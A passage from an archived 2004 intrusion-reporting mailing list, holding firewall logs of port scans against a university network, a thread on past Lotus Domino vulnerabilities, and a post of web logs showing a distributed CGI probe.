xxx.yyy.255.249:4899 SYN ******S* Jul 11 02:46:57 65.89.43.60:3419 -> xxx.yyy.255.250:4899 SYN ******S* Jul 11 02:46:57 65.89.43.60:3420 -> xxx.yyy.255.251:4899 SYN ******S* Jul 11 02:46:57 65.89.43.60:3421 -> xxx.yyy.255.252:4899 SYN ******S* Jul 11 02:46:57 65.89.43.60:3422 -> xxx.yyy.255.253:4899 SYN ******S* Jul 11 02:46:57 65.89.43.60:3423 -> xxx.yyy.255.254:4899 SYN ******S* 43511 Jul 11 03:15:57 168.115.112.134:2152 -> xxx.yyy.1.1:1433 SYN ******S* Jul 11 03:15:57 168.115.112.134:2153 -> xxx.yyy.1.2:1433 SYN ******S* Jul 11 03:15:57 168.115.112.134:2154 -> xxx.yyy.1.3:1433 SYN ******S* Jul 11 03:16:00 168.115.112.134:2155 -> xxx.yyy.1.4:1433 SYN ******S* Jul 11 03:16:00 168.115.112.134:2156 -> xxx.yyy.1.5:1433 SYN ******S* Jul 11 03:16:00 168.115.112.134:2157 -> xxx.yyy.1.6:1433 SYN ******S* Jul 11 03:16:00 168.115.112.134:2158 -> xxx.yyy.1.7:1433 SYN ******S* Jul 11 03:16:00 168.115.112.134:2159 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 11 03:23:07 168.115.112.134:1320 -> xxx.yyy.156.175:1433 SYN ******S* Jul 11 03:23:07 168.115.112.134:1317 -> xxx.yyy.156.172:1433 SYN ******S* Jul 11 03:23:07 168.115.112.134:1321 -> xxx.yyy.156.176:1433 SYN ******S* Jul 11 03:23:07 168.115.112.134:1318 -> xxx.yyy.156.173:1433 SYN ******S* Jul 11 03:23:07 168.115.112.134:1315 -> xxx.yyy.156.170:1433 SYN ******S* Jul 11 03:23:07 168.115.112.134:1322 -> xxx.yyy.156.177:1433 SYN ******S* Jul 11 03:23:07 168.115.112.134:1319 -> xxx.yyy.156.174:1433 SYN ******S* Jul 11 03:23:07 168.115.112.134:1316 -> xxx.yyy.156.171:1433 SYN ******S* Jul 11 03:23:07 168.115.112.134:1596 -> xxx.yyy.157.194:1433 SYN ******S* 31274 Jul 11 16:52:47 82.37.26.119:2591 -> xxx.yyy.1.3:1433 SYN ******S* Jul 11 16:52:44 82.37.26.119:2593 -> xxx.yyy.1.1:1433 SYN ******S* Jul 11 16:52:44 82.37.26.119:2594 -> xxx.yyy.1.0:1433 SYN ******S* Jul 11 16:52:47 82.37.26.119:2589 -> xxx.yyy.1.5:1433 SYN ******S* Jul 11 16:52:47 82.37.26.119:2590 -> xxx.yyy.1.4:1433 SYN ******S* Jul 11 16:52:47 82.37.26.119:2592 -> xxx.yyy.1.2:1433 SYN ******S* Jul 11 16:52:44 82.37.26.119:2609 -> xxx.yyy.1.6:1433 SYN ******S* Jul 11 16:52:44 82.37.26.119:2611 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 11 18:17:21 82.37.26.119:3610 -> xxx.yyy.95.64:1433 SYN ******S* Jul 11 18:17:21 82.37.26.119:3611 -> xxx.yyy.95.65:1433 SYN ******S* Jul 11 18:17:22 82.37.26.119:3612 -> xxx.yyy.95.66:1433 SYN ******S* Jul 11 18:17:22 82.37.26.119:3613 -> xxx.yyy.95.67:1433 SYN ******S* Jul 11 18:17:22 82.37.26.119:3614 -> xxx.yyy.95.68:1433 SYN ******S* Jul 11 18:17:22 82.37.26.119:3615 -> xxx.yyy.95.69:1433 SYN ******S* Jul 11 18:17:22 82.37.26.119:3616 -> xxx.yyy.95.70:1433 SYN ******S* Jul 11 18:17:22 82.37.26.119:3617 -> xxx.yyy.95.71:1433 SYN ******S* Jul 11 18:17:22 82.37.26.119:3620 -> xxx.yyy.95.72:1433 SYN ******S* 29828 Jul 11 13:19:51 217.26.10.66:2328 -> xxx.yyy.1.21:22 SYN ******S* Jul 11 13:19:54 217.26.10.66:2329 -> xxx.yyy.1.22:22 SYN ******S* Jul 11 13:19:51 217.26.10.66:2175 -> xxx.yyy.1.23:22 SYN ******S* Jul 11 13:19:51 217.26.10.66:2176 -> xxx.yyy.1.24:22 SYN ******S* Jul 11 13:19:51 217.26.10.66:2178 -> xxx.yyy.1.26:22 SYN ******S* Jul 11 13:19:51 217.26.10.66:2179 -> xxx.yyy.1.27:22 SYN ******S* Jul 11 13:19:51 217.26.10.66:2211 -> xxx.yyy.1.59:22 SYN ******S* Jul 11 13:19:54 217.26.10.66:2330 -> xxx.yyy.1.25:22 SYN ******S* [...] Jul 11 13:28:43 217.26.10.66:3666 -> xxx.yyy.255.175:22 SYN ******S* Jul 11 13:28:43 217.26.10.66:3667 -> xxx.yyy.255.176:22 SYN ******S* Jul 11 13:28:43 217.26.10.66:3668 -> xxx.yyy.255.177:22 SYN ******S* Jul 11 13:28:43 217.26.10.66:3669 -> xxx.yyy.255.178:22 SYN ******S* Jul 11 13:28:43 217.26.10.66:3670 -> xxx.yyy.255.179:22 SYN ******S* Jul 11 13:28:43 217.26.10.66:3671 -> xxx.yyy.255.180:22 SYN ******S* Jul 11 13:28:43 217.26.10.66:3672 -> xxx.yyy.255.181:22 SYN ******S* Jul 11 13:28:43 217.26.10.66:3673 -> xxx.yyy.255.182:22 SYN ******S* 19566 Jul 11 18:48:49 221.154.71.56:3230 -> xxx.yyy.174.223:5554 SYN ******S* Jul 11 18:48:50 221.154.71.56:3770 -> xxx.yyy.174.223:1023 SYN ******S* Jul 11 18:48:52 221.154.71.56:1145 -> xxx.yyy.174.223:9898 SYN ******S* Jul 11 18:48:49 221.154.71.56:3233 -> xxx.yyy.174.226:5554 SYN ******S* Jul 11 18:48:50 221.154.71.56:3793 -> xxx.yyy.174.226:1023 SYN ******S* Jul 11 18:48:52 221.154.71.56:1212 -> xxx.yyy.174.226:9898 SYN ******S* Jul 11 18:48:49 221.154.71.56:3241 -> xxx.yyy.174.233:5554 SYN ******S* Jul 11 18:48:50 221.154.71.56:3779 -> xxx.yyy.174.233:1023 SYN ******S* [...] Jul 11 18:49:38 221.154.71.56:1595 -> xxx.yyy.195.81:9898 SYN ******S* Jul 11 18:49:38 221.154.71.56:1598 -> xxx.yyy.195.84:9898 SYN ******S* Jul 11 18:49:38 221.154.71.56:1589 -> xxx.yyy.195.74:9898 SYN ******S* Jul 11 18:49:38 221.154.71.56:1613 -> xxx.yyy.195.86:9898 SYN ******S* Jul 11 18:49:38 221.154.71.56:1596 -> xxx.yyy.195.82:9898 SYN ******S* Jul 11 18:49:38 221.154.71.56:1597 -> xxx.yyy.195.83:9898 SYN ******S* Jul 11 18:49:38 221.154.71.56:1615 -> xxx.yyy.195.88:9898 SYN ******S* Jul 11 18:49:38 221.154.71.56:1623 -> xxx.yyy.195.79:9898 SYN ******S* Jul 11 18:49:38 221.154.71.56:1614 -> xxx.yyy.195.87:9898 SYN ******S* 15109 Jul 11 23:56:48 222.100.36.37:2723 -> xxx.yyy.236.80:5554 SYN ******S* Jul 11 23:56:49 222.100.36.37:3316 -> xxx.yyy.236.80:1023 SYN ******S* Jul 11 23:56:50 222.100.36.37:1216 -> xxx.yyy.236.80:9898 SYN ******S* Jul 11 23:56:48 222.100.36.37:2727 -> xxx.yyy.236.84:5554 SYN ******S* Jul 11 23:56:49 222.100.36.37:3320 -> xxx.yyy.236.84:1023 SYN ******S* Jul 11 23:56:50 222.100.36.37:1220 -> xxx.yyy.236.84:9898 SYN ******S* Jul 11 23:56:47 222.100.36.37:2734 -> xxx.yyy.236.91:5554 SYN ******S* Jul 11 23:56:48 222.100.36.37:3327 -> xxx.yyy.236.91:1023 SYN ******S* [...] Jul 11 23:57:29 222.100.36.37:3274 -> xxx.yyy.255.254:9898 SYN ******S* Jul 11 23:57:28 222.100.36.37:2418 -> xxx.yyy.255.213:9898 SYN ******S* Jul 11 23:57:28 222.100.36.37:2443 -> xxx.yyy.255.214:9898 SYN ******S* Jul 11 23:57:28 222.100.36.37:2639 -> xxx.yyy.255.215:9898 SYN ******S* Jul 11 23:57:28 222.100.36.37:2894 -> xxx.yyy.255.220:9898 SYN ******S* Jul 11 23:57:29 222.100.36.37:2892 -> xxx.yyy.255.218:9898 SYN ******S* Jul 11 23:57:29 222.100.36.37:2897 -> xxx.yyy.255.223:9898 SYN ******S* Jul 11 23:57:29 222.100.36.37:2899 -> xxx.yyy.255.225:9898 SYN ******S* Jul 11 23:57:29 222.100.36.37:2919 -> xxx.yyy.255.238:9898 SYN ******S* 13877 Jul 11 00:57:18 221.216.146.118:4909 -> xxx.yyy.154.100:5554 SYN ******S* Jul 11 00:57:21 221.216.146.118:2239 -> xxx.yyy.154.100:9898 SYN ******S* Jul 11 00:57:18 221.216.146.118:4919 -> xxx.yyy.154.101:5554 SYN ******S* Jul 11 00:57:20 221.216.146.118:1473 -> xxx.yyy.154.101:1023 SYN ******S* Jul 11 00:57:18 221.216.146.118:4920 -> xxx.yyy.154.103:5554 SYN ******S* Jul 11 00:57:18 221.216.146.118:4922 -> xxx.yyy.154.111:5554 SYN ******S* Jul 11 00:57:18 221.216.146.118:4923 -> xxx.yyy.154.112:5554 SYN ******S* Jul 11 00:57:18 221.216.146.118:4924 -> xxx.yyy.154.113:5554 SYN ******S* [...] Jul 11 00:58:14 221.216.146.118:1307 -> xxx.yyy.154.218:9898 SYN ******S* Jul 11 00:58:14 221.216.146.118:1308 -> xxx.yyy.154.226:9898 SYN ******S* Jul 11 00:58:14 221.216.146.118:1320 -> xxx.yyy.154.230:9898 SYN ******S* Jul 11 00:58:14 221.216.146.118:1325 -> xxx.yyy.154.229:9898 SYN ******S* Jul 11 00:58:14 221.216.146.118:1327 -> xxx.yyy.154.233:9898 SYN ******S* Jul 11 00:58:14 221.216.146.118:1329 -> xxx.yyy.154.231:9898 SYN ******S* Jul 11 00:58:14 221.216.146.118:1330 -> xxx.yyy.154.234:9898 SYN ******S* Jul 11 00:58:14 221.216.146.118:1331 -> xxx.yyy.154.232:9898 SYN ******S* Jul 11 00:58:14 221.216.146.118:1335 -> xxx.yyy.154.235:9898 SYN ******S* 13211 Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.1:3128 SYN ******S* Jul 11 07:41:54 211.55.14.186:22002 -> xxx.yyy.1.2:1080 SYN ******S* Jul 11 07:41:54 211.55.14.186:22002 -> xxx.yyy.1.2:10080 SYN ******S* [...] Jul 11 09:49:55 211.55.14.186:22002 -> xxx.yyy.67.232:1080 SYN ******S* Jul 11 09:49:55 211.55.14.186:22002 -> xxx.yyy.67.232:10080 SYN ******S* Jul 11 09:49:55 211.55.14.186:22002 -> xxx.yyy.67.232:3128 SYN ******S* Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.233:1080 SYN ******S* Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.233:10080 SYN ******S* Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.233:3128 SYN ******S* Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.234:1080 SYN ******S* Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.234:10080 SYN ******S* 12101 Jul 11 08:00:14 219.35.68.196:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 11 08:00:14 219.35.68.196:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.1:3128 SYN ******S* Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.2:3127 SYN ******S* [...] Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.254:3127 SYN ******S* Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.254:1080 SYN ******S* Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.254:10080 SYN ******S* Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.254:3128 SYN ******S* Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.255:3127 SYN ******S* Jul 11 08:55:54 219.35.68.196:22002 -> xxx.yyy.32.255:1080 SYN ******S* Jul 11 08:55:54 219.35.68.196:22002 -> xxx.yyy.32.255:10080 SYN ******S* Jul 11 08:55:54 219.35.68.196:22002 -> xxx.yyy.32.255:3128 SYN ******S* 12056 Jul 11 00:56:06 221.216.97.86:3865 -> xxx.yyy.71.164:5554 SYN ******S* Jul 11 00:56:07 221.216.97.86:4477 -> xxx.yyy.71.164:1023 SYN ******S* Jul 11 00:56:09 221.216.97.86:1720 -> xxx.yyy.71.164:9898 SYN ******S* Jul 11 00:56:06 221.216.97.86:3866 -> xxx.yyy.71.165:5554 SYN ******S* Jul 11 00:56:07 221.216.97.86:4478 -> xxx.yyy.71.165:1023 SYN ******S* Jul 11 00:56:09 221.216.97.86:1721 -> xxx.yyy.71.165:9898 SYN ******S* Jul 11 00:56:06 221.216.97.86:3867 -> xxx.yyy.71.166:5554 SYN ******S* Jul 11 00:56:07 221.216.97.86:4486 -> xxx.yyy.71.166:1023 SYN ******S* [...] Jul 11 00:56:55 221.216.97.86:1241 -> xxx.yyy.92.12:9898 SYN ******S* Jul 11 00:56:55 221.216.97.86:1250 -> xxx.yyy.92.21:9898 SYN ******S* Jul 11 00:56:55 221.216.97.86:1251 -> xxx.yyy.92.22:9898 SYN ******S* Jul 11 00:56:55 221.216.97.86:1271 -> xxx.yyy.92.24:9898 SYN ******S* Jul 11 00:56:55 221.216.97.86:1270 -> xxx.yyy.92.23:9898 SYN ******S* Jul 11 00:56:55 221.216.97.86:1257 -> xxx.yyy.92.26:9898 SYN ******S* Jul 11 00:56:55 221.216.97.86:1292 -> xxx.yyy.92.16:9898 SYN ******S* Jul 11 00:56:55 221.216.97.86:1289 -> xxx.yyy.92.17:9898 SYN ******S* 11452 Jul 11 00:56:07 61.55.15.54:2873 -> xxx.yyy.133.14:5554 SYN ******S* Jul 11 00:56:08 61.55.15.54:3674 -> xxx.yyy.133.14:1023 SYN ******S* Jul 11 00:56:09 61.55.15.54:1380 -> xxx.yyy.133.14:9898 SYN ******S* Jul 11 00:56:07 61.55.15.54:2876 -> xxx.yyy.133.17:5554 SYN ******S* Jul 11 00:56:08 61.55.15.54:3677 -> xxx.yyy.133.17:1023 SYN ******S* Jul 11 00:56:09 61.55.15.54:1383 -> xxx.yyy.133.17:9898 SYN ******S* Jul 11 00:56:07 61.55.15.54:2877 -> xxx.yyy.133.18:5554 SYN ******S* Jul 11 00:56:08 61.55.15.54:3678 -> xxx.yyy.133.18:1023 SYN ******S* [...] Jul 11 00:56:50 61.55.15.54:4230 -> xxx.yyy.134.187:9898 SYN ******S* Jul 11 00:56:50 61.55.15.54:4245 -> xxx.yyy.134.192:9898 SYN ******S* Jul 11 00:56:50 61.55.15.54:4321 -> xxx.yyy.134.199:9898 SYN ******S* Jul 11 00:56:50 61.55.15.54:4342 -> xxx.yyy.134.201:9898 SYN ******S* Jul 11 00:56:50 61.55.15.54:4343 -> xxx.yyy.134.191:9898 SYN ******S* Jul 11 00:56:50 61.55.15.54:4340 -> xxx.yyy.134.204:9898 SYN ******S* Jul 11 00:56:50 61.55.15.54:4341 -> xxx.yyy.134.206:9898 SYN ******S* Jul 11 00:56:50 61.55.15.54:4345 -> xxx.yyy.134.196:9898 SYN ******S* Jul 11 00:56:50 61.55.15.54:4344 -> xxx.yyy.134.197:9898 SYN ******S* 11208 Jul 11 23:55:02 221.189.43.16:4339 -> xxx.yyy.236.79:5554 SYN ******S* Jul 11 23:55:02 221.189.43.16:4408 -> xxx.yyy.236.115:5554 SYN ******S* Jul 11 23:55:03 221.189.43.16:4395 -> xxx.yyy.236.102:5554 SYN ******S* Jul 11 23:55:03 221.189.43.16:4400 -> xxx.yyy.236.107:5554 SYN ******S* Jul 11 23:55:03 221.189.43.16:4389 -> xxx.yyy.236.96:5554 SYN ******S* Jul 11 23:55:03 221.189.43.16:4345 -> xxx.yyy.236.84:5554 SYN ******S* Jul 11 23:55:03 221.189.43.16:4352 -> xxx.yyy.236.91:5554 SYN ******S* Jul 11 23:55:03 221.189.43.16:4418 -> xxx.yyy.236.125:5554 SYN ******S* [...] Jul 11 23:55:48 221.189.43.16:1235 -> xxx.yyy.255.237:9898 SYN ******S* Jul 11 23:55:48 221.189.43.16:1231 -> xxx.yyy.255.233:9898 SYN ******S* Jul 11 23:55:48 221.189.43.16:1236 -> xxx.yyy.255.238:9898 SYN ******S* Jul 11 23:55:48 221.189.43.16:1232 -> xxx.yyy.255.234:9898 SYN ******S* Jul 11 23:55:48 221.189.43.16:1237 -> xxx.yyy.255.239:9898 SYN ******S* Jul 11 23:55:48 221.189.43.16:1238 -> xxx.yyy.255.240:9898 SYN ******S* Jul 11 23:55:48 221.189.43.16:1241 -> xxx.yyy.255.243:9898 SYN ******S* Jul 11 23:55:48 221.189.43.16:1242 -> xxx.yyy.255.244:9898 SYN ******S* Jul 11 23:55:49 221.189.43.16:1239 -> xxx.yyy.255.241:9898 SYN ******S* 10532 Jul 11 23:56:23 221.153.138.201:2870 -> xxx.yyy.194.125:5554 SYN ******S* Jul 11 23:56:24 221.153.138.201:3680 -> xxx.yyy.194.125:1023 SYN ******S* Jul 11 23:56:26 221.153.138.201:1745 -> xxx.yyy.194.125:9898 SYN ******S* Jul 11 23:56:23 221.153.138.201:2887 -> xxx.yyy.194.124:5554 SYN ******S* Jul 11 23:56:24 221.153.138.201:3698 -> xxx.yyy.194.124:1023 SYN ******S* Jul 11 23:56:26 221.153.138.201:1771 -> xxx.yyy.194.124:9898 SYN ******S* Jul 11 23:56:23 221.153.138.201:2922 -> xxx.yyy.194.128:5554 SYN ******S* Jul 11 23:56:23 221.153.138.201:2947 -> xxx.yyy.194.130:5554 SYN ******S* [...] Jul 11 23:57:07 221.153.138.201:2112 -> xxx.yyy.214.183:9898 SYN ******S* Jul 11 23:57:07 221.153.138.201:2161 -> xxx.yyy.214.192:9898 SYN ******S* Jul 11 23:57:07 221.153.138.201:2165 -> xxx.yyy.214.193:9898 SYN ******S* Jul 11 23:57:07 221.153.138.201:2227 -> xxx.yyy.214.204:9898 SYN ******S* Jul 11 23:57:08 221.153.138.201:2228 -> xxx.yyy.214.205:9898 SYN ******S* Jul 11 23:57:08 221.153.138.201:2341 -> xxx.yyy.214.217:9898 SYN ******S* Jul 11 23:57:08 221.153.138.201:2342 -> xxx.yyy.214.218:9898 SYN ******S* Jul 11 23:57:08 221.153.138.201:2464 -> xxx.yyy.214.244:9898 SYN ******S* Jul 11 23:57:08 221.153.138.201:2460 -> xxx.yyy.214.234:9898 SYN ******S* 10510 Jul 11 00:56:34 221.218.42.124:1047 -> xxx.yyy.195.88:5554 SYN ******S* Jul 11 00:56:35 221.218.42.124:1586 -> xxx.yyy.195.88:1023 SYN ******S* Jul 11 00:56:34 221.218.42.124:1073 -> xxx.yyy.195.91:5554 SYN ******S* Jul 11 00:56:35 221.218.42.124:1604 -> xxx.yyy.195.91:1023 SYN ******S* Jul 11 00:56:34 221.218.42.124:1072 -> xxx.yyy.195.90:5554 SYN ******S* Jul 11 00:56:35 221.218.42.124:1603 -> xxx.yyy.195.90:1023 SYN ******S* Jul 11 00:56:34 221.218.42.124:1110 -> xxx.yyy.195.92:5554 SYN ******S* Jul 11 00:56:36 221.218.42.124:1614 -> xxx.yyy.195.92:1023 SYN ******S* [...] Jul 11 00:57:21 221.218.42.124:2970 -> xxx.yyy.215.63:9898 SYN ******S* Jul 11 00:57:21 221.218.42.124:2966 -> xxx.yyy.215.59:9898 SYN ******S* Jul 11 00:57:21 221.218.42.124:2968 -> xxx.yyy.215.61:9898 SYN ******S* Jul 11 00:57:21 221.218.42.124:2972 -> xxx.yyy.215.74:9898 SYN ******S* Jul 11 00:57:22 221.218.42.124:3524 -> xxx.yyy.215.208:9898 SYN ******S* Jul 11 00:57:22 221.218.42.124:3545 -> xxx.yyy.215.207:9898 SYN ******S* Jul 11 00:57:22 221.218.42.124:3543 -> xxx.yyy.215.202:9898 SYN ******S* Jul 11 00:57:22 221.218.42.124:3544 -> xxx.yyy.215.206:9898 SYN ******S* 9973 Jul 11 00:56:59 218.24.75.56:3762 -> xxx.yyy.134.104:1023 SYN ******S* Jul 11 00:56:59 218.24.75.56:3763 -> xxx.yyy.134.102:1023 SYN ******S* Jul 11 00:56:59 218.24.75.56:3764 -> xxx.yyy.134.101:1023 SYN ******S* Jul 11 00:56:59 218.24.75.56:3765 -> xxx.yyy.134.100:1023 SYN ******S* Jul 11 00:57:01 218.24.75.56:1388 -> xxx.yyy.134.100:9898 SYN ******S* Jul 11 00:56:59 218.24.75.56:3767 -> xxx.yyy.134.98:1023 SYN ******S* Jul 11 00:57:01 218.24.75.56:1391 -> xxx.yyy.134.98:9898 SYN ******S* Jul 11 00:56:59 218.24.75.56:3768 -> xxx.yyy.134.96:1023 SYN ******S* [...] Jul 11 00:57:40 218.24.75.56:3703 -> xxx.yyy.154.60:9898 SYN ******S* Jul 11 00:57:40 218.24.75.56:3704 -> xxx.yyy.154.61:9898 SYN ******S* Jul 11 00:57:40 218.24.75.56:3706 -> xxx.yyy.154.63:9898 SYN ******S* Jul 11 00:57:40 218.24.75.56:3707 -> xxx.yyy.154.64:9898 SYN ******S* Jul 11 00:57:40 218.24.75.56:3705 -> xxx.yyy.154.62:9898 SYN ******S* Jul 11 00:57:40 218.24.75.56:3708 -> xxx.yyy.154.65:9898 SYN ******S* Jul 11 00:57:40 218.24.75.56:3709 -> xxx.yyy.154.66:9898 SYN ******S* Jul 11 00:57:40 218.24.75.56:3743 -> xxx.yyy.154.90:9898 SYN ******S* Jul 11 00:57:40 218.24.75.56:3750 -> xxx.yyy.154.97:9898 SYN ******S* 9779 Jul 11 22:39:28 221.192.211.170:4916 -> xxx.yyy.72.124:5554 SYN ******S* Jul 11 22:39:28 221.192.211.170:4919 -> xxx.yyy.72.125:5554 SYN ******S* Jul 11 22:39:31 221.192.211.170:2480 -> xxx.yyy.72.125:9898 SYN ******S* Jul 11 22:39:28 221.192.211.170:4928 -> xxx.yyy.72.126:5554 SYN ******S* Jul 11 22:39:29 221.192.211.170:1500 -> xxx.yyy.72.126:1023 SYN ******S* Jul 11 22:39:31 221.192.211.170:2502 -> xxx.yyy.72.126:9898 SYN ******S* Jul 11 22:39:28 221.192.211.170:4932 -> xxx.yyy.72.129:5554 SYN ******S* Jul 11 22:39:28 221.192.211.170:4931 -> xxx.yyy.72.127:5554 SYN ******S* [...] Jul 11 22:40:11 221.192.211.170:2693 -> xxx.yyy.92.216:9898 SYN ******S* Jul 11 22:40:11 221.192.211.170:2702 -> xxx.yyy.92.220:9898 SYN ******S* Jul 11 22:40:11 221.192.211.170:2709 -> xxx.yyy.92.227:9898 SYN ******S* Jul 11 22:40:11 221.192.211.170:2724 -> xxx.yyy.92.233:9898 SYN ******S* Jul 11 22:40:11 221.192.211.170:2748 -> xxx.yyy.92.235:9898 SYN ******S* Jul 11 22:40:11 221.192.211.170:2753 -> xxx.yyy.92.237:9898 SYN ******S* Jul 11 22:40:11 221.192.211.170:2755 -> xxx.yyy.92.239:9898 SYN ******S* Jul 11 22:40:11 221.192.211.170:2754 -> xxx.yyy.92.238:9898 SYN ******S* 8274 Jul 11 00:56:18 218.11.229.179:3579 -> xxx.yyy.195.89:5554 SYN ******S* Jul 11 00:56:19 218.11.229.179:4326 -> xxx.yyy.195.89:1023 SYN ******S* Jul 11 00:56:21 218.11.229.179:1586 -> xxx.yyy.195.89:9898 SYN ******S* Jul 11 00:56:18 218.11.229.179:3582 -> xxx.yyy.195.92:5554 SYN ******S* Jul 11 00:56:19 218.11.229.179:4329 -> xxx.yyy.195.92:1023 SYN ******S* Jul 11 00:56:21 218.11.229.179:1589 -> xxx.yyy.195.92:9898 SYN ******S* Jul 11 00:56:18 218.11.229.179:3578 -> xxx.yyy.195.88:5554 SYN ******S* Jul 11 00:56:19 218.11.229.179:4325 -> xxx.yyy.195.88:1023 SYN ******S* [...] Jul 11 00:56:57 218.11.229.179:3535 -> xxx.yyy.214.181:9898 SYN ******S* Jul 11 00:56:57 218.11.229.179:3531 -> xxx.yyy.214.177:9898 SYN ******S* Jul 11 00:56:57 218.11.229.179:3536 -> xxx.yyy.214.182:9898 SYN ******S* Jul 11 00:56:57 218.11.229.179:3568 -> xxx.yyy.214.214:9898 SYN ******S* Jul 11 00:56:58 218.11.229.179:3606 -> xxx.yyy.214.252:9898 SYN ******S* Jul 11 00:56:58 218.11.229.179:3605 -> xxx.yyy.214.251:9898 SYN ******S* Jul 11 00:56:58 218.11.229.179:3607 -> xxx.yyy.214.253:9898 SYN ******S* Jul 11 00:56:58 218.11.229.179:3609 -> xxx.yyy.214.255:9898 SYN ******S* 8191 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From mozrat at gmail.com Mon Jul 12 14:22:08 2004 From: mozrat at gmail.com (Simon Morris) Date: Mon, 12 Jul 2004 15:22:08 +0100 Subject: [Intrusions] Vulnerabilities with Lotus Domino Products In-Reply-To: References: Message-ID: Hello list. I hope this is the right place to ask this kind of question. I need to research the implications of exposing an internal Domino 6.x server to the Internet on port 80, and possibly 1352 (Lotus Notes protocol) Does anyone have any recollection of past vulnerabilites on these ports with Domino. Thanks in advance ~SM From EBeaudoin at investpsp.ca Mon Jul 12 15:51:06 2004 From: EBeaudoin at investpsp.ca (Eric Beaudoin) Date: Mon, 12 Jul 2004 11:51:06 -0400 Subject: [Intrusions] Vulnerabilities with Lotus Domino Products Message-ID: <7156EB36CF1B4140937A7690E2A6DDDF8D4D55@mail.investpsp.ca> Try . That should get you started (for the past vulnerabilities part). Hope that helps. ?ric Beaudoin Senior Advisor, Infrastructure & Security (514) 938-7540 -----Original Message----- From: intrusions-bounces at lists.sans.org [mailto:intrusions-bounces at lists.sans.org] On Behalf Of Simon Morris Sent: July 12, 2004 10:22 To: intrusions at lists.sans.org Subject: [Intrusions] Vulnerabilities with Lotus Domino Products Hello list. I hope this is the right place to ask this kind of question. I need to research the implications of exposing an internal Domino 6.x server to the Internet on port 80, and possibly 1352 (Lotus Notes protocol) Does anyone have any recollection of past vulnerabilites on these ports with Domino. Thanks in advance ~SM _______________________________________________ Intrusions mailing list Intrusions at lists.sans.org http://www.dshield.org/mailman/listinfo/intrusions From list.account at cerdant.com Mon Jul 12 16:10:20 2004 From: list.account at cerdant.com (List Account) Date: Mon, 12 Jul 2004 12:10:20 -0400 Subject: [Intrusions] Vulnerabilities with Lotus Domino Products In-Reply-To: Message-ID: <0bf701c4682a$bcff0040$2d6ea8c0@ngxp> Can you forward me any private replies you get. I have a customer running Domino on the net and am curious to what you find. Thanks, Nathan -----Original Message----- From: intrusions-bounces at lists.sans.org [mailto:intrusions-bounces at lists.sans.org] On Behalf Of Simon Morris Sent: Monday, July 12, 2004 10:22 AM To: intrusions at lists.sans.org Subject: [Intrusions] Vulnerabilities with Lotus Domino Products Hello list. I hope this is the right place to ask this kind of question. I need to research the implications of exposing an internal Domino 6.x server to the Internet on port 80, and possibly 1352 (Lotus Notes protocol) Does anyone have any recollection of past vulnerabilites on these ports with Domino. Thanks in advance ~SM _______________________________________________ Intrusions mailing list Intrusions at lists.sans.org http://www.dshield.org/mailman/listinfo/intrusions From rimshot at pandora.be Mon Jul 12 17:29:35 2004 From: rimshot at pandora.be (Wouter Clarie) Date: Mon, 12 Jul 2004 19:29:35 +0200 (CEST) Subject: [Intrusions] Vulnerabilities with Lotus Domino Products In-Reply-To: References: Message-ID: Hi Simon, On Mon, 12 Jul 2004, Simon Morris wrote: > I need to research the implications of exposing an internal Domino 6.x > server to the Internet on port 80, and possibly 1352 (Lotus Notes > protocol) > > Does anyone have any recollection of past vulnerabilites on these ports > with Domino. You can look these things up in the database of SecurityFocus at: http://www.securityfocus.com/bid/vendor/ or in the CVE dictionary at: http://www.cve.mitre.org/cgi-bin/cvekey.cgi?keyword=domino Regards, Wouter From sekure at gmail.com Mon Jul 12 18:55:18 2004 From: sekure at gmail.com (sekure) Date: Mon, 12 Jul 2004 14:55:18 -0400 Subject: [Intrusions] Distributed scan Message-ID: <1639ada004071211555fc7bb3e@mail.gmail.com> Looking over some log files, check out this distributed scan i got hit with over the weekend. Snort caught most of it, the rest i had to fish out of httpd logs. I count 10 different sources, all connecting to my server within 30 seconds, making similar requests... My guess: this is someone utilizing a botnet to do distributed scans.: 212.174.111.110 - - [10/Jul/2004:20:07:02 -0400] "POST /cgi-bin/sendform.cgi HTTP/1.0" 404 5540 200.62.136.145 - - [10/Jul/2004:20:07:03 -0400] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 5540 148.244.150.52 - - [10/Jul/2004:20:07:04 -0400] "POST /cgi-bin/contact.cgi HTTP/1.0" 404 5540 209.184.108.162 - - [10/Jul/2004:20:07:08 -0400] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 5540 209.26.56.10 - - [10/Jul/2004:20:07:16 -0400] 